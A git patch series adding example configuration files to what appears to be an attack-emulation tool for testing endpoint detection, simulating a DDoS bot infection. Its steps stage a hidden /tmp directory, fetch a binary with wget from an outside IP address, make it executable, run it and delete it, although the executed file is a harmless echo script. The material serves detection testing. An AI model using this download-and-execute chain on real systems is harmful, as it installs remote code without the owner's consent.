From c27128142c6e6762d4cb92755545d41ace5cae53 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Mon, 24 May 2021 16:33:29 -0600 Subject: [PATCH 1/2] created ddos_bot example reaction --- examples/ddos_bot/atoms.json | 20 +++++++++++++++++++ .../ddos_bot/generic_ddos_bot_reaction.json | 9 +++++++++ 2 files changed, 29 insertions(+) create mode 100644 examples/ddos_bot/atoms.json create mode 100644 examples/ddos_bot/generic_ddos_bot_reaction.json diff --git a/examples/ddos_bot/atoms.json b/examples/ddos_bot/atoms.json new file mode 100644 index 0000000..f2121c5 --- /dev/null +++ b/examples/ddos_bot/atoms.json @@ -0,0 +1,20 @@ +[ + { + "name": "DELETE-BOT", + "remove": [ "./x86_64" ] + }, + { + "name": "DOWNLOAD-BOT", + "fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64" ], + "file-create": { "path": "/tmp/x86_64", "data": "#!/bin/sh\nchain-reactor DDoS Botnet test\n", "backup-and-revert": false }, + "chmod": { "path": "mips", "mode": "755" } + }, + { + "name": "EXECUTE-BOT", + "fork-and-rename": [ "./x86_64", "x86_64" ] + }, + { + "name": "STAGE-DIRECTORY", + "execve": [ "cd", "/tmp/" ] + } +] diff --git a/examples/ddos_bot/generic_ddos_bot_reaction.json b/examples/ddos_bot/generic_ddos_bot_reaction.json new file mode 100644 index 0000000..c1217a6 --- /dev/null +++ b/examples/ddos_bot/generic_ddos_bot_reaction.json @@ -0,0 +1,9 @@ +{ + "name": "generic_ddos_bot", + "atoms": [ + "STAGE-DIRECTORY", + "DELETE-BOT", + "DOWNLOAD-BOT", + "EXECUTE-BOT" + ] +} From acd2af74257e8bdee4725caab666aba46afd8c79 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 1 Sep 2021 15:41:10 -0600 Subject: [PATCH 2/2] reorder atoms and fix executable creation --- examples/ddos_bot/atoms.json | 14 ++++++++------ examples/ddos_bot/generic_ddos_bot_reaction.json | 4 ++-- 2 files changed, 10 insertions(+), 8 deletions(-) diff --git a/examples/ddos_bot/atoms.json b/examples/ddos_bot/atoms.json index f2121c5..92c00ae 100644 --- a/examples/ddos_bot/atoms.json +++ b/examples/ddos_bot/atoms.json @@ -1,20 +1,22 @@ [ { "name": "DELETE-BOT", - "remove": [ "./x86_64" ] + "remove": [ "/tmp/.reaction/x86_64", "/tmp/.reaction" ] }, { "name": "DOWNLOAD-BOT", - "fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64" ], - "file-create": { "path": "/tmp/x86_64", "data": "#!/bin/sh\nchain-reactor DDoS Botnet test\n", "backup-and-revert": false }, - "chmod": { "path": "mips", "mode": "755" } + "fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64", "-o", "/tmp/.reaction/x86_64" ], + "file-create": { "path": "x86_64", "data": "#!/bin/sh\necho 'chain-reactor DDoS Botnet test'\n", "backup-and-revert": false }, + "chmod": { "path": "x86_64", "mode": "755" }, + "copy": [ "x86_64", "/tmp/.reaction/x86_64" ], + "remove": [ "x86_64" ] }, { "name": "EXECUTE-BOT", - "fork-and-rename": [ "./x86_64", "x86_64" ] + "execve": [ "/tmp/.reaction/x86_64", "exit" ] }, { "name": "STAGE-DIRECTORY", - "execve": [ "cd", "/tmp/" ] + "execve": [ "mkdir", "-p", "/tmp/.reaction" ] } ] diff --git a/examples/ddos_bot/generic_ddos_bot_reaction.json b/examples/ddos_bot/generic_ddos_bot_reaction.json index c1217a6..aa02bf9 100644 --- a/examples/ddos_bot/generic_ddos_bot_reaction.json +++ b/examples/ddos_bot/generic_ddos_bot_reaction.json @@ -2,8 +2,8 @@ "name": "generic_ddos_bot", "atoms": [ "STAGE-DIRECTORY", - "DELETE-BOT", "DOWNLOAD-BOT", - "EXECUTE-BOT" + "EXECUTE-BOT", + "DELETE-BOT" ] }